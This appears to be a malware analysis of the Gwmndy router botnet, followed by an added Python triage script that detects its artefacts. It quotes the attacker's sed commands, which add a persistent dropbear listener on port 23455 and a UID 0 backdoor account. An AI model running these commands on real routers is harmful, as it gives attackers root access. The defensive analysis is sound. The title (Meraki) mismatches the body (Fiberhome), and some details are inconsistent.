Meraki router dropbear ssh
On July 24, 2019, our Unknown Threat Detection System highlighted a suspicious ELF file with 0 VirusTotal detections. When we looked further into it, we realized it is a component of an IoT botnet targeting Fiberhome routers. But it does not do the regular stuff such as DDoS, cryptojacking, spamming or information stealing. Its only purpose is to set the routers up as SSH tunneling proxy nodes. Also, unlike typical botnets, which try their best to infect as many victims as they can, this one has pretty much stopped looking for new bots after its active daily bot count reached the low 200s. It seems that the author is satisfied with that number, which probably provides enough proxy capacity for whatever purpose he needs.

The ELF file itself is a Reporter: it periodically obtains router information such as the device IP and uploads it to a remote web interface, so the author can get hold of the device even when the router's IP changes. Correspondingly, we also observed that the attacker developed client programs for the Windows and Linux platforms. They access the remote web interface to obtain the device IP reported by the Reporter, then use the backdoor password to establish an SSH tunnel (dynamic port forwarding) and create a SOCKS5 proxy service locally.

We named this malware Gwmndy based on the domain name used by the attacker.

Gwmndy consists mainly of vpn.sh, the Reporter and the SSH client programs, and provides a corresponding web interface through a web server to transmit information such as bot IPs.

Gwmndy Reverse Analysis

vpn.sh sample information

POSIX shell script text executable, ASCII text

We can clearly see that the attacker runs the dropbear program on the target router and adds the startup command to the /fh/extend/userapp.sh file:

    sed -i '/killall dropbear/a\dropbear -p 23455 &' /fh/extend/userapp.sh
    sed -i '/killall dropbear/a\/fh/dropbear -p 23455 &' /fh/extend/userapp.sh
    sed -i '2c admin:x:0:0:root:/root:/bin/sh' /etc/passwd
    sed -i '/killall dropbear/a\/fh/vpnip &' /fh/extend/userapp.sh

Each "a\" command appends its line directly after the existing "killall dropbear" line of the startup script, so a dropbear listening on TCP port 23455 (plus a second copy at /fh/dropbear) is launched on every boot. It also tampers with the shadow file to add the backdoor account: the "2c" command replaces line 2 of /etc/passwd with an "admin" entry that has UID 0 and a root shell. Finally it runs vpnip (see below) and rinetd, an open source port forwarder.

vpnip, the ELF file referred to above:

ELF 32-bit MSB executable, MIPS, MIPS32 version 1 (SYSV), statically linked, not stripped

The binary also carries this shell pipeline, which lists the dropbear processes that were not started with an explicit -p port:

    #ps | grep "dropbear" | grep -v "dropbear -p" | awk ''
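The artefacts vpn.sh leaves behind (an extra dropbear started from /fh/extend/userapp.sh on a non-default port, a second UID 0 account in /etc/passwd, a /fh/vpnip process) are exactly what a responder would check for on a suspect router. The script below is an added example, not Netlab's analysis code or the attacker's tooling: it triages those three artefacts from text copied off the device. The sample userapp.sh, passwd and ps listings are constructed for the demo, and the layout of userapp.sh (a "killall dropbear" line that the sed commands append after) is assumed from the sed commands shown above.

```python
"""Triage a Fiberhome router for the Gwmndy persistence indicators.

Added example; it reads the three artefacts named in the write-up
(/fh/extend/userapp.sh, /etc/passwd, a `ps` listing) as text and
reports what vpn.sh would have left behind.
"""
import re

# Port the write-up shows the attacker's dropbear listening on.
BACKDOOR_PORT = "23455"

# Constructed sample of /fh/extend/userapp.sh after vpn.sh has run: each
# `sed -i '/killall dropbear/a\...'` appended one line after `killall dropbear`.
SAMPLE_USERAPP = """#!/bin/sh
killall dropbear
dropbear -p 23455 &
/fh/dropbear -p 23455 &
/fh/vpnip &
dropbear &
"""

# Constructed /etc/passwd after `sed -i '2c admin:x:0:0:root:/root:/bin/sh'`.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/sh
admin:x:0:0:root:/root:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/false
"""

# Constructed `ps` output on an infected device.
SAMPLE_PS = """  PID USER       VSZ STAT COMMAND
  812 root      1240 S    dropbear
  913 root      1240 S    dropbear -p 23455
  914 root      1240 S    /fh/dropbear -p 23455
  955 root       880 S    /fh/vpnip
"""


def suspicious_startup_lines(userapp_text):
    """Lines appended after `killall dropbear` that start a dropbear on an
    explicit port or launch the Gwmndy helpers (vpnip, rinetd).
    Returns (kind, detail, line) tuples."""
    flags = []
    after_killall = False
    for raw in userapp_text.splitlines():
        line = raw.strip()
        if line == "killall dropbear":
            after_killall = True
            continue
        if not after_killall:
            continue
        m = re.search(r"dropbear\s+-p\s+(\d+)", line)
        if m:
            flags.append(("dropbear-extra-port", m.group(1), line))
        elif re.search(r"(^|/)(vpnip|rinetd)\b", line):
            flags.append(("gwmndy-helper", line.split()[0], line))
    return flags


def extra_uid0_accounts(passwd_text):
    """UID 0 accounts other than root; the `2c admin:x:0:0:...` sed creates one."""
    found = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0" and fields[0] != "root":
            found.append(fields[0])
    return found


def dropbear_with_port(ps_text):
    """Inverse of the grep chain in the write-up: keep, rather than drop, the
    `dropbear -p` instances, since those are the backdoor listeners.
    Returns (pid, port) tuples."""
    hits = []
    for line in ps_text.splitlines():
        m = re.search(r"dropbear\s+-p\s+(\d+)", line)
        if m:
            hits.append((line.split()[0], m.group(1)))
    return hits


def triage(userapp_text, passwd_text, ps_text):
    """Combine the three checks; 'infected' is True if any indicator fires."""
    report = {
        "startup": suspicious_startup_lines(userapp_text),
        "uid0": extra_uid0_accounts(passwd_text),
        "listeners": dropbear_with_port(ps_text),
    }
    report["infected"] = bool(
        report["startup"]
        or report["uid0"]
        or any(port == BACKDOOR_PORT for _, port in report["listeners"])
    )
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_USERAPP, SAMPLE_PASSWD, SAMPLE_PS).items():
        print(key, value)
```

Port 23455 is the value seen in this campaign; a redeployed variant can change it, so the durable signals are any dropbear started with an explicit -p after the "killall dropbear" line and any non-root UID 0 entry in /etc/passwd, which is why those checks fire regardless of the port.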